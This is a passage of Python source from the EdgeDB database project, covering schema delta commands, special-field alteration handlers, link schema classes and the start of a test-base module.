# Check if the subject of this command has any outside references
# minus any current expiring refs and minus structural child refs
# (e.g. source backref in pointers of an object type).
refs = [
ref
for ref in schema.get_referrers(self.scls)
if not ref.is_parent_ref(schema, self.scls)
and not context.is_deleting(ref)
]
return bool(refs)
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
if self.if_exists:
scls = self.get_object(schema, context, default=None)
if scls is None:
context.current().op.discard(self)
return schema
else:
scls = self.get_object(schema, context)
self.scls = scls
with self.new_context(schema, context, scls):
if (
not self.canonical
and self.if_unused
and self._has_outside_references(schema, context)
):
parent_ctx = context.parent()
if parent_ctx is not None:
parent_ctx.op.discard(self)
return schema
schema = self._delete_begin(schema, context)
schema = self._delete_innards(schema, context)
schema = self._delete_finalize(schema, context)
return schema
class DeleteExternalObject(
DeleteObject[so.ExternalObject_T],
ExternalObjectCommand[so.ExternalObject_T],
):
def _delete_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
return schema
def _delete_innards(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_subcommands(metaclass=so.Object):
schema = op.apply(schema, context=context)
return schema
def _delete_finalize(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
return schema
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
self.scls = _dummy_object # type: ignore
with self.new_context(schema, context, self.scls):
schema = self._delete_begin(schema, context)
schema = self._delete_innards(schema, context)
schema = self._delete_finalize(schema, context)
return schema
special_field_alter_handlers: Dict[
str,
Dict[Type[so.Object], Type[AlterSpecialObjectField[so.Object]]],
] = {}
class AlterSpecialObjectField(AlterObjectFragment[so.Object_T]):
"""Base class for AlterObjectFragment implementations for special fields.
When the generic `AlterObjectProperty` handling of field value transitions
is insufficient, declare a subclass of this to implement custom handling.
"""
_field: ClassVar[str]
def __init_subclass__(
cls,
*,
field: Optional[str] = None,
**kwargs: Any,
) -> None:
super().__init_subclass__(**kwargs)
if field is None:
if any(
issubclass(b, AlterSpecialObjectField)
for b in cls.__mro__[1:]
):
return
else:
raise TypeError(
"AlterSpecialObjectField.__init_subclass__() missing "
"1 required keyword-only argument: 'field'"
)
handlers = special_field_alter_handlers.get(field)
if handlers is None:
handlers = special_field_alter_handlers[field] = {}
schema_metaclass = cls.get_schema_metaclass()
handlers[schema_metaclass] = cls # type: ignore
cls._field = field
def clone(self, name: sn.Name) -> AlterSpecialObjectField[so.Object_T]:
return struct.Struct.replace(self, classname=name)
@classmethod
def _cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> ObjectCommand[so.Object_T]:
this_op = context.current().op
assert isinstance(this_op, ObjectCommand)
return cls(classname=this_op.classname)
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
assert isinstance(astnode, qlast.SetField)
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
cmd.add(AlterObjectProperty.regular_cmd_from_ast(
schema, astnode, context))
return cmd
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
attrs = self._enumerate_attribute_cmds()
assert len(attrs) == 1, "expected one attribute command"
return attrs[0]._get_ast(schema, context, parent_node=parent_node)
def get_verb(self) -> str:
return f'alter the {self._field} of'
def get_special_field_alter_handler(
field: str,
schema_cls: Type[so.Object],
) -> Optional[Type[AlterSpecialObjectField[so.Object]]]:
"""Return a custom handler for the field value transition, if any.
Returns a subclass of AlterSpecialObjectField, when in the context
of an AlterObject operation, and a special handler has been declared.
"""
field_handlers = special_field_alter_handlers.get(field)
if field_handlers is None:
return None
return field_handlers.get(schema_cls)
def get_special_field_create_handler(
field: str,
schema_cls: Type[so.Object],
) -> Optional[Type[AlterSpecialObjectField[so.Object]]]:
"""Return a custom handler for the field value transition, if any.
Returns a subclass of AlterSpecialObjectField, when in the context
of an CreateObject operation, and a special handler has been declared.
For now this is just a hacky special case:
the 'required' field of Pointers. If that changes, we should generalize
the mechanism.
"""
if field != 'required':
return None
return get_special_field_alter_handler(field, schema_cls)
def get_special_field_alter_handler_for_context(
field: str,
context: CommandContext,
) -> Optional[Type[AlterSpecialObjectField[so.Object]]]:
"""Return a custom handler for the field value transition, if any.
Returns a subclass of AlterSpecialObjectField, when in the context
of an AlterObject operation, and a special handler has been declared.
"""
this_op = context.current().op
if (
isinstance(this_op, AlterObjectOrFragment)
and not isinstance(this_op, AlterSpecialObjectField)
):
mcls = this_op.get_schema_metaclass()
return get_special_field_alter_handler(field, mcls)
elif isinstance(this_op, CreateObject):
mcls = this_op.get_schema_metaclass()
return get_special_field_create_handler(field, mcls)
else:
return None
class AlterObjectProperty(Command):
astnode = qlast.SetField
property = struct.Field(str)
old_value = struct.Field[Any](object, default=None)
new_value = struct.Field[Any](object, default=None)
old_inherited = struct.Field(bool, default=False)
new_inherited = struct.Field(bool, default=False)
new_computed = struct.Field(bool, default=False)
old_computed = struct.Field(bool, default=False)
from_default = struct.Field(bool, default=False)
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
assert isinstance(astnode, qlast.SetField)
handler = get_special_field_alter_handler_for_context(
astnode.name, context)
if handler is not None:
return handler._cmd_tree_from_ast(schema, astnode, context)
else:
return cls.regular_cmd_from_ast(schema, astnode, context)
@classmethod
def regular_cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.SetField,
context: CommandContext,
) -> Command:
propname = astnode.name
parent_ctx = context.current()
parent_op = parent_ctx.op
assert isinstance(parent_op, ObjectCommand)
parent_cls = parent_op.get_schema_metaclass()
if (
propname.startswith('orig_')
and context.compat_ver_is_before(
(1, 0, verutils.VersionStage.ALPHA, 8)
)
and not parent_cls.has_field(propname)
):
return Nop()
else:
try:
field = parent_cls.get_field(propname)
except LookupError:
raise errors.SchemaDefinitionError(
f'{propname!r} is not a valid field',
context=astnode.context)
if not (
astnode.special_syntax
or field.allow_ddl_set
or context.stdmode
or context.testmode
):
raise errors.SchemaDefinitionError(
f'{propname!r} is not a valid field',
context=astnode.context)
if field.name == 'id' and not isinstance(parent_op, CreateObject):
raise errors.SchemaDefinitionError(
f'cannot alter object id',
context=astnode.context)
new_value: Any
if field.type is s_expr.Expression:
if astnode.value is None:
new_value = None
else:
orig_text = cls.get_orig_expr_text(
schema, parent_op.qlast, field.name)
if (
orig_text is not None
and context.compat_ver_is_before(
(1, 0, verutils.VersionStage.ALPHA, 6)
)
):
# Versions prior to a6 used a different expression
# normalization strategy, so we must renormalize the
# expression.
expr_ql = qlcompiler.renormalize_compat(
astnode.value,
orig_text,
schema=schema,
localnames=context.localnames,
)
else:
expr_ql = astnode.value
new_value = s_expr.Expression.from_ast(
expr_ql,
schema,
context.modaliases,
context.localnames,
)
else:
if isinstance(astnode.value, qlast.Tuple):
new_value = tuple(
qlcompiler.evaluate_ast_to_python_val(
el, schema=schema)
for el in astnode.value.elements
)
elif isinstance(astnode.value, qlast.ObjectRef):
new_value = utils.ast_to_object_shell(
astnode.value,
metaclass=so.Object,
modaliases=context.modaliases,
schema=schema,
)
elif (
isinstance(astnode.value, qlast.Set)
and not astnode.value.elements
):
# empty set
new_value = None
elif isinstance(astnode.value, qlast.TypeExpr):
from . import types as s_types
if not isinstance(parent_op, QualifiedObjectCommand):
raise AssertionError(
'cannot determine module for derived compound type: '
'parent operation is not a QualifiedObjectCommand'
)
new_value = utils.ast_to_type_shell(
astnode.value,
metaclass=s_types.Type,
module=parent_op.classname.module,
modaliases=context.modaliases,
schema=schema,
)
else:
new_value = qlcompiler.evaluate_ast_to_python_val(
astnode.value, schema=schema) if astnode.value else None
if new_value is not None:
new_value = field.coerce_value(schema, new_value)
return cls(
property=propname,
new_value=new_value,
source_context=astnode.context,
)
def is_data_safe(self) -> bool:
# Field alterations on existing schema objects
# generally represent semantic changes and are
# reversible. Non-safe field alters are normally
# represented by a dedicated subcommand, such as
# SetLinkType.
return True
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
value = self.new_value
new_value_empty = \
(value is None or
(isinstance(value, collections.abc.Container) and not value))
old_value_empty = \
(self.old_value is None or
(isinstance(self.old_value, collections.abc.Container)
and not self.old_value))
parent_ctx = context.current()
parent_op = parent_ctx.op
assert isinstance(parent_op, ObjectCommand)
assert parent_node is not None
parent_cls = parent_op.get_schema_metaclass()
field = parent_cls.get_field(self.property)
if field is None:
raise errors.SchemaDefinitionError(
f'{self.property!r} is not a valid field',
context=self.source_context)
if self.property == 'id':
return None
parent_node_attr = parent_op.get_ast_attr_for_field(
field.name, type(parent_node))
if (
not field.allow_ddl_set
and not (
field.special_ddl_syntax
and isinstance(parent_node, qlast.AlterObject)
)
and self.property != 'expr'
and parent_node_attr is None
):
# Don't produce any AST if:
#
# * a field does not have the "allow_ddl_set" option, unless
# it's an 'expr' field.
#
# 'expr' fields come from the "USING" clause and are specially
# treated in parser and codegen.
return None
if (
(
self.new_inherited
and not self.old_inherited
and not old_value_empty
) or (
self.new_computed
and not self.old_computed
and not self.old_inherited
and not old_value_empty
)
):
# The field became inherited or computed, in which case we should
# generate a RESET.
return qlast.SetField(
name=self.property,
value=None,
special_syntax=field.special_ddl_syntax,
)
if self.new_inherited or self.new_computed:
# We don't want to show inherited or computed properties unless
# we are in "descriptive_mode" ...
if not context.descriptive_mode:
return None
if not (
field.describe_visibility
& so.DescribeVisibilityFlags.SHOW_IF_DERIVED
):
# ... or if the field shouldn't be shown when inherited
# or computed.
return None
if (
not (
field.describe_visibility
& so.DescribeVisibilityFlags.SHOW_IF_DEFAULT
) and field.default == value
):
# ... or if the field should not be shown when the value
# mathdes the default.
return None
parentop_sn = sn.shortname_from_fullname(parent_op.classname).name
if self.property == 'default' and parentop_sn == 'id':
# ... or if it's 'default' for the 'id' property
# (special case).
return None
if self.from_default:
if not context.descriptive_mode:
return None
if not (
field.describe_visibility
& so.DescribeVisibilityFlags.SHOW_IF_DEFAULT
):
# ... or if the field should not be shown when the value
# mathdes the default.
return None
if new_value_empty:
if old_value_empty:
return None
else:
value = None
elif issubclass(field.type, s_expr.Expression):
return self._get_expr_field_ast(
schema,
context,
parent_op=parent_op,
field=field,
parent_node=parent_node,
parent_node_attr=parent_node_attr,
)
elif parent_node_attr is not None:
setattr(parent_node, parent_node_attr, value)
return None
elif (v := utils.is_nontrivial_container(value)) and v is not None:
value = qlast.Tuple(elements=[
utils.const_ast_from_python(el) for el in v
])
elif isinstance(value, uuid.UUID):
value = qlast.TypeCast(
expr=qlast.StringConstant.from_python(str(value)),
type=qlast.TypeName(
maintype=qlast.ObjectRef(
name='uuid',
module='std',
)
)
)
elif isinstance(value, so.ObjectShell):
value = utils.shell_to_ast(schema, value)
else:
value = utils.const_ast_from_python(value)
return qlast.SetField(
name=self.property,
value=value,
special_syntax=field.special_ddl_syntax,
)
def _get_expr_field_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_op: ObjectCommand[so.Object],
field: so.Field[Any],
parent_node: qlast.DDLOperation,
parent_node_attr: Optional[str],
) -> Optional[qlast.DDLOperation]:
from edb import edgeql
assert isinstance(
self.new_value,
(s_expr.Expression, s_expr.ExpressionShell),
)
expr_ql = edgeql.parse_fragment(self.new_value.text)
if parent_node is not None and parent_node_attr is not None:
setattr(parent_node, parent_node_attr, expr_ql)
return None
else:
return qlast.SetField(
name=self.property,
value=expr_ql,
special_syntax=(self.property == 'expr'),
)
def __repr__(self) -> str:
return '<%s.%s "%s":"%s"->"%s">' % (
self.__class__.__module__, self.__class__.__name__,
self.property, self.old_value, self.new_value)
def get_friendly_description(
self,
*,
parent_op: Optional[Command] = None,
schema: Optional[s_schema.Schema] = None,
object: Any = None,
object_desc: Optional[str] = None,
) -> str:
if parent_op is not None:
assert isinstance(parent_op, ObjectCommand)
object_desc = parent_op.get_friendly_object_name_for_description(
schema=schema,
object=object,
object_desc=object_desc,
)
return f'alter the {self.property} of {object_desc}'
else:
return f'alter the {self.property} of schema object'
def compile_ddl(
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
*,
context: Optional[CommandContext]=None,
) -> Command:
if context is None:
context = CommandContext()
astnode_type = type(astnode)
primary_cmdcls = CommandMeta._astnode_map.get(astnode_type)
if primary_cmdcls is None:
for astnode_type_base in astnode_type.__mro__[1:]:
primary_cmdcls = CommandMeta._astnode_map.get(astnode_type_base)
if primary_cmdcls is not None:
break
else:
raise AssertionError(
f'no delta command class for AST node {astnode!r}')
cmdcls = primary_cmdcls.command_for_ast_node(astnode, schema, context)
context_class = cmdcls.get_context_class()
if context_class is not None:
modaliases = cmdcls._modaliases_from_ast(schema, astnode, context)
localnames = cmdcls.localnames_from_ast(schema, astnode, context)
ctxcls = cast(
Type[ObjectCommandContext[so.Object]],
context_class,
)
ctx = ctxcls(
schema,
op=cast(ObjectCommand[so.Object], _dummy_command),
scls=_dummy_object,
modaliases=modaliases,
localnames=localnames,
)
with context(ctx):
cmd = cmdcls._cmd_tree_from_ast(schema, astnode, context)
else:
cmd = cmdcls._cmd_tree_from_ast(schema, astnode, context)
return cmd
def get_object_delta_command(
*,
objtype: Type[so.Object_T],
cmdtype: Type[ObjectCommand_T],
schema: s_schema.Schema,
name: sn.Name,
ddl_identity: Optional[Mapping[str, Any]] = None,
**kwargs: Any,
) -> ObjectCommand_T:
cmdcls = cast(
Type[ObjectCommand_T],
get_object_command_class_or_die(cmdtype, objtype),
)
return cmdcls(
classname=name,
ddl_identity=dict(ddl_identity) if ddl_identity is not None else None,
**kwargs,
)
def get_object_command_id(delta: ObjectCommand[Any]) -> str:
quoted_name: str
if isinstance(delta.classname, sn.QualName):
quoted_module = qlquote.quote_ident(delta.classname.module)
quoted_nqname = qlquote.quote_ident(delta.classname.name)
quoted_name = f'{quoted_module}::{quoted_nqname}'
else:
quoted_name = qlquote.quote_ident(str(delta.classname))
if delta.orig_cmd_type is not None:
cmdtype = delta.orig_cmd_type
else:
cmdtype = type(delta)
qlcls = delta.get_schema_metaclass().get_ql_class_or_die()
return f'{cmdtype.__name__} {qlcls} {quoted_name}'
def apply(
delta: Command,
*,
schema: s_schema.Schema,
context: Optional[CommandContext] = None,
) -> s_schema.Schema:
if context is None:
context = CommandContext()
if not isinstance(delta, DeltaRoot):
root = DeltaRoot()
root.add(delta)
else:
root = delta
return root.apply(schema, context)
```
#### File: edb/schema/links.py
```python
from __future__ import annotations
from typing import *
from edb.edgeql import ast as qlast
from edb.edgeql import qltypes
from edb import errors
from . import abc as s_abc
from . import constraints
from . import delta as sd
from . import indexes
from . import inheriting
from . import properties
from . import name as sn
from . import objects as so
from . import pointers
from . import referencing
from . import sources
from . import utils
if TYPE_CHECKING:
from . import objtypes as s_objtypes
from . import types as s_types
from . import schema as s_schema
LinkTargetDeleteAction = qltypes.LinkTargetDeleteAction
def merge_actions(
target: so.InheritingObject,
sources: List[so.Object],
field_name: str,
*,
ignore_local: bool = False,
schema: s_schema.Schema,
) -> Any:
if not ignore_local:
ours = target.get_explicit_local_field_value(schema, field_name, None)
else:
ours = None
if ours is None:
current = None
current_from = None
for source in sources:
theirs = source.get_explicit_field_value(schema, field_name, None)
if theirs is not None:
if current is None:
current = theirs
current_from = source
elif current != theirs:
target_source = target.get_source(schema)
current_from_source = current_from.get_source(schema)
source_source = source.get_source(schema)
tgt_repr = (
f'{target_source.get_displayname(schema)}.'
f'{target.get_displayname(schema)}'
)
cf_repr = (
f'{current_from_source.get_displayname(schema)}.'
f'{current_from.get_displayname(schema)}'
)
other_repr = (
f'{source_source.get_displayname(schema)}.'
f'{source.get_displayname(schema)}'
)
raise errors.SchemaError(
f'cannot implicitly resolve the '
f'`on target delete` action for '
f'{tgt_repr!r}: it is defined as {current} in '
f'{cf_repr!r} and as {theirs} in {other_repr!r}; '
f'to resolve, declare `on target delete` '
f'explicitly on {tgt_repr!r}'
)
return current
else:
return ours
class Link(
sources.Source,
pointers.Pointer,
s_abc.Link,
qlkind=qltypes.SchemaObjectClass.LINK,
data_safe=False,
):
on_target_delete = so.SchemaField(
LinkTargetDeleteAction,
default=LinkTargetDeleteAction.Restrict,
coerce=True,
compcoef=0.9,
merge_fn=merge_actions)
def get_target(self, schema: s_schema.Schema) -> s_objtypes.ObjectType:
return self.get_field_value( # type: ignore[no-any-return]
schema, 'target')
def is_link_property(self, schema: s_schema.Schema) -> bool:
return False
def is_property(self, schema: s_schema.Schema) -> bool:
return False
def scalar(self) -> bool:
return False
def has_user_defined_properties(self, schema: s_schema.Schema) -> bool:
return bool([p for p in self.get_pointers(schema).objects(schema)
if not p.is_special_pointer(schema)])
def get_source_type(
self,
schema: s_schema.Schema
) -> s_types.Type:
from . import types as s_types
source = self.get_source(schema)
assert isinstance(source, s_types.Type)
return source
def compare(
self,
other: so.Object,
*,
our_schema: s_schema.Schema,
their_schema: s_schema.Schema,
context: so.ComparisonContext,
) -> float:
if not isinstance(other, Link):
if isinstance(other, pointers.Pointer):
return 0.0
else:
raise NotImplementedError()
return super().compare(
other, our_schema=our_schema,
their_schema=their_schema, context=context)
def set_target(
self,
schema: s_schema.Schema,
target: s_types.Type,
) -> s_schema.Schema:
schema = super().set_target(schema, target)
tgt_prop = self.getptr(schema, sn.UnqualName('target'))
schema = tgt_prop.set_target(schema, target)
return schema
@classmethod
def get_root_classes(cls) -> Tuple[sn.QualName, ...]:
return (
sn.QualName(module='std', name='link'),
sn.QualName(module='schema', name='__type__'),
)
@classmethod
def get_default_base_name(self) -> sn.QualName:
return sn.QualName('std', 'link')
class LinkSourceCommandContext(sources.SourceCommandContext):
pass
class LinkSourceCommand(inheriting.InheritingObjectCommand[sources.Source_T]):
pass
class LinkCommandContext(pointers.PointerCommandContext[Link],
constraints.ConsistencySubjectCommandContext,
properties.PropertySourceContext,
indexes.IndexSourceCommandContext):
pass
class LinkCommand(
properties.PropertySourceCommand[Link],
pointers.PointerCommand[Link],
context_class=LinkCommandContext,
referrer_context_class=LinkSourceCommandContext,
):
def _append_subcmd_ast(
self,
schema: s_schema.Schema,
node: qlast.DDLOperation,
subcmd: sd.Command,
context: sd.CommandContext,
) -> None:
if (
isinstance(subcmd, pointers.PointerCommand)
and subcmd.classname != self.classname
):
pname = sn.shortname_from_fullname(subcmd.classname)
if pname.name in {'source', 'target'}:
return
super()._append_subcmd_ast(schema, node, subcmd, context)
def validate_object(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> None:
"""Check that link definition is sound."""
super().validate_object(schema, context)
scls = self.scls
assert isinstance(scls, Link)
if not scls.get_owned(schema):
return
target = scls.get_target(schema)
assert target is not None
if not target.is_object_type():
srcctx = self.get_attribute_source_context('target')
raise errors.InvalidLinkTargetError(
f'invalid link target, expected object type, got '
f'{target.get_schema_class_displayname()}',
context=srcctx,
)
if (
not scls.is_pure_computable(schema)
and not scls.get_from_alias(schema)
and target.is_view(schema)
):
srcctx = self.get_attribute_source_context('target')
raise errors.InvalidLinkTargetError(
f'invalid link type: {target.get_displayname(schema)!r}'
f' is an expression alias, not a proper object type',
context=srcctx,
)
def _get_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
node = super()._get_ast(schema, context, parent_node=parent_node)
# __type__ link is special, and while it exists on every object
# it does not have a defined default in the schema (and therefore
# it isn't marked as required.) We intervene here to mark all
# __type__ links required when rendering for SDL/TEXT.
if context.declarative and node is not None:
assert isinstance(node, (qlast.CreateConcreteLink,
qlast.CreateLink))
if node.name.name == '__type__':
assert isinstance(node, qlast.CreateConcretePointer)
node.is_required = True
return node
def _reinherit_classref_dict(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refdict: so.RefDict,
) -> Tuple[s_schema.Schema,
Dict[sn.Name, Type[sd.ObjectCommand[so.Object]]]]:
if self.scls.get_computable(schema) and refdict.attr != 'pointers':
# If the link is a computable, the inheritance would only
# happen in the case of aliasing, and in that case we only
# need to inherit the link properties and nothing else.
return schema, {}
return super()._reinherit_classref_dict(schema, context, refdict)
class CreateLink(
pointers.CreatePointer[Link],
LinkCommand,
):
astnode = [qlast.CreateConcreteLink, qlast.CreateLink]
referenced_astnode = qlast.CreateConcreteLink
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
if isinstance(astnode, qlast.CreateConcreteLink):
assert isinstance(cmd, pointers.PointerCommand)
cmd._process_create_or_alter_ast(schema, astnode, context)
else:
# this is an abstract property then
if cmd.get_attribute_value('default') is not None:
raise errors.SchemaDefinitionError(
f"'default' is not a valid field for an abstract link",
context=astnode.context)
assert isinstance(cmd, sd.Command)
return cmd
def get_ast_attr_for_field(
self,
field: str,
astnode: Type[qlast.DDLOperation],
) -> Optional[str]:
if (
field == 'required'
and issubclass(astnode, qlast.CreateConcreteLink)
):
return 'is_required'
elif (
field == 'cardinality'
and issubclass(astnode, qlast.CreateConcreteLink)
):
return 'cardinality'
else:
return super().get_ast_attr_for_field(field, astnode)
def _apply_field_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
node: qlast.DDLOperation,
op: sd.AlterObjectProperty,
) -> None:
objtype = self.get_referrer_context(context)
if op.property == 'target' and objtype:
# Due to how SDL is processed the underlying AST may be an
# AlterConcreteLink, which requires different handling.
if isinstance(node, qlast.CreateConcreteLink):
if not node.target:
expr = self.get_attribute_value('expr')
if expr is not None:
node.target = expr.qlast
else:
t = op.new_value
assert isinstance(t, (so.Object, so.ObjectShell))
node.target = utils.typeref_to_ast(schema, t)
else:
assert isinstance(op.new_value, (so.Object, so.ObjectShell))
node.commands.append(
qlast.SetPointerType(
value=utils.typeref_to_ast(schema, op.new_value),
)
)
elif op.property == 'on_target_delete':
node.commands.append(qlast.OnTargetDelete(cascade=op.new_value))
else:
super()._apply_field_ast(schema, context, node, op)
def inherit_classref_dict(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refdict: so.RefDict,
) -> sd.CommandGroup:
if self.scls.get_computable(schema) and refdict.attr != 'pointers':
# If the link is a computable, the inheritance would only
# happen in the case of aliasing, and in that case we only
# need to inherit the link properties and nothing else.
return sd.CommandGroup()
cmd = super().inherit_classref_dict(schema, context, refdict)
if refdict.attr != 'pointers':
return cmd
parent_ctx = self.get_referrer_context(context)
if parent_ctx is None:
return cmd
base_prop_name = sn.QualName('std', 'source')
s_name = sn.get_specialized_name(
sn.QualName('__', 'source'), str(self.classname))
src_prop_name = sn.QualName(
name=s_name, module=self.classname.module)
src_prop = properties.CreateProperty(
classname=src_prop_name,
is_strong_ref=True,
)
src_prop.set_attribute_value('name', src_prop_name)
src_prop.set_attribute_value(
'bases',
so.ObjectList.create(schema, [schema.get(base_prop_name)]),
)
src_prop.set_attribute_value(
'source',
self.scls,
)
src_prop.set_attribute_value(
'target',
parent_ctx.op.scls,
)
src_prop.set_attribute_value('required', True)
src_prop.set_attribute_value('readonly', True)
src_prop.set_attribute_value('final', True)
src_prop.set_attribute_value('owned', True)
src_prop.set_attribute_value('from_alias',
self.scls.get_from_alias(schema))
src_prop.set_attribute_value('cardinality',
qltypes.SchemaCardinality.One)
cmd.prepend(src_prop)
base_prop_name = sn.QualName('std', 'target')
s_name = sn.get_specialized_name(
sn.QualName('__', 'target'), str(self.classname))
tgt_prop_name = sn.QualName(
name=s_name, module=self.classname.module)
tgt_prop = properties.CreateProperty(
classname=tgt_prop_name,
is_strong_ref=True,
)
tgt_prop.set_attribute_value('name', tgt_prop_name)
tgt_prop.set_attribute_value(
'bases',
so.ObjectList.create(schema, [schema.get(base_prop_name)]),
)
tgt_prop.set_attribute_value(
'source',
self.scls,
)
tgt_prop.set_attribute_value(
'target',
self.get_attribute_value('target'),
)
tgt_prop.set_attribute_value('required', False)
tgt_prop.set_attribute_value('readonly', True)
tgt_prop.set_attribute_value('final', True)
tgt_prop.set_attribute_value('owned', True)
tgt_prop.set_attribute_value('from_alias',
self.scls.get_from_alias(schema))
tgt_prop.set_attribute_value('cardinality',
qltypes.SchemaCardinality.One)
cmd.prepend(tgt_prop)
return cmd
class RenameLink(
LinkCommand,
referencing.RenameReferencedInheritingObject[Link],
):
pass
class RebaseLink(
LinkCommand,
referencing.RebaseReferencedInheritingObject[Link],
):
pass
class SetLinkType(
pointers.SetPointerType[Link],
referrer_context_class=LinkSourceCommandContext,
field='target',
):
def _alter_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
schema = super()._alter_begin(schema, context)
scls = self.scls
new_target = scls.get_target(schema)
if not context.canonical:
# We need to update the target link prop as well
tgt_prop = scls.getptr(schema, sn.UnqualName('target'))
tgt_prop_alter = tgt_prop.init_delta_command(
schema, sd.AlterObject)
tgt_prop_alter.set_attribute_value('target', new_target)
self.add(tgt_prop_alter)
return schema
class AlterLinkUpperCardinality(
pointers.AlterPointerUpperCardinality[Link],
referrer_context_class=LinkSourceCommandContext,
field='cardinality',
):
pass
class AlterLinkLowerCardinality(
pointers.AlterPointerLowerCardinality[Link],
referrer_context_class=LinkSourceCommandContext,
field='required',
):
pass
class AlterLinkOwned(
referencing.AlterOwned[Link],
pointers.PointerCommandOrFragment[Link],
referrer_context_class=LinkSourceCommandContext,
field='owned',
):
pass
class SetTargetDeletePolicy(sd.Command):
astnode = qlast.OnTargetDelete
@classmethod
def _cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.AlterObjectProperty:
return sd.AlterObjectProperty(
property='on_target_delete'
)
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.Command:
assert isinstance(astnode, qlast.OnTargetDelete)
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
assert isinstance(cmd, sd.AlterObjectProperty)
cmd.new_value = astnode.cascade
return cmd
class AlterLink(
LinkCommand,
pointers.AlterPointer[Link],
):
astnode = [qlast.AlterConcreteLink, qlast.AlterLink]
referenced_astnode = qlast.AlterConcreteLink
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> AlterLink:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
assert isinstance(cmd, AlterLink)
if isinstance(astnode, qlast.CreateConcreteLink):
cmd._process_create_or_alter_ast(schema, astnode, context)
else:
cmd._process_alter_ast(schema, astnode, context)
return cmd
def _apply_field_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
node: qlast.DDLOperation,
op: sd.AlterObjectProperty,
) -> None:
if op.property == 'target':
if op.new_value:
assert isinstance(op.new_value, so.ObjectShell)
node.commands.append(
qlast.SetPointerType(
value=utils.typeref_to_ast(schema, op.new_value),
),
)
elif op.property == 'computable':
if not op.new_value:
node.commands.append(
qlast.SetField(
name='expr',
value=None,
special_syntax=True,
),
)
elif op.property == 'on_target_delete':
node.commands.append(qlast.OnTargetDelete(cascade=op.new_value))
else:
super()._apply_field_ast(schema, context, node, op)
class DeleteLink(
LinkCommand,
pointers.DeletePointer[Link],
):
astnode = [qlast.DropConcreteLink, qlast.DropLink]
referenced_astnode = qlast.DropConcreteLink
# NB: target type cleanup (e.g. target compound type) is done by
# the DeleteProperty handler for the @target property.
def _get_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
if self.get_orig_attribute_value('from_alias'):
# This is an alias type, appropriate DDL would be generated
# from the corresponding Alter/DeleteAlias node.
return None
else:
return super()._get_ast(schema, context, parent_node=parent_node)
```
#### File: edb/testbase/lang.py
```python
from __future__ import annotations
from typing import *
import typing
import functools
import os
import re
import unittest
from edb.common import context
from edb.common import debug
from edb.common import devmode
from edb.common import markup
from edb import errors
from edb import edgeql
from edb.edgeql import ast as qlast
from edb.edgeql import parser as qlparser
from edb.server import buildmeta
from edb.server import defines
from edb.server import compiler as edbcompiler
from edb.schema import ddl as s_ddl
from edb.schema import delta as sd
from edb.schema import migrations as s_migrations # noqa
from edb.schema import reflection as s_refl
from edb.schema import schema as s_schema
from edb.schema import std as s_std
from edb.schema import utils as s_utils
def must_fail(exc_type, exc_msg_re=None, **kwargs):
"""A decorator to ensure that the test fails with a specific exception.
If exc_msg_re is passed, assertRaisesRegex will be used to match the
exception message.
Example:
@must_fail(EdgeQLSyntaxError,
'non-default argument follows', line=2, col=61)
def test_edgeql_syntax_1(self):
...
"""
def wrap(func):
args = (exc_type,)
if exc_msg_re is not None:
args += (exc_msg_re,)
_set_spec(func, 'must_fail', (args, kwargs))
return func
return wrap
def _set_spec(func, name, attrs):
try:
spec = func.test_spec
except AttributeError:
spec = func.test_spec = {}
assert name not in spec
spec[name] = attrs
class DocTestMeta(type(unittest.TestCase)):
def __new__(mcls, name, bases, dct):
for attr, meth in tuple(dct.items()):
if attr.startswith('test_') and meth.__doc__:
@functools.wraps(meth)
def wrapper(self, meth=meth, doc=meth.__doc__):
spec = getattr(meth, 'test_spec', {})
spec['test_name'] = meth.__name__
if doc:
output = error = None
source, _, output = doc.partition('\n% OK %')
if not output:
source, _, error = doc.partition('\n% ERROR %')
if not error:
output = None
else:
output = error
else:
source = output = None
self._run_test(source=source, spec=spec, expected=output)
dct[attr] = wrapper
return super().__new__(mcls, name, bases, dct)
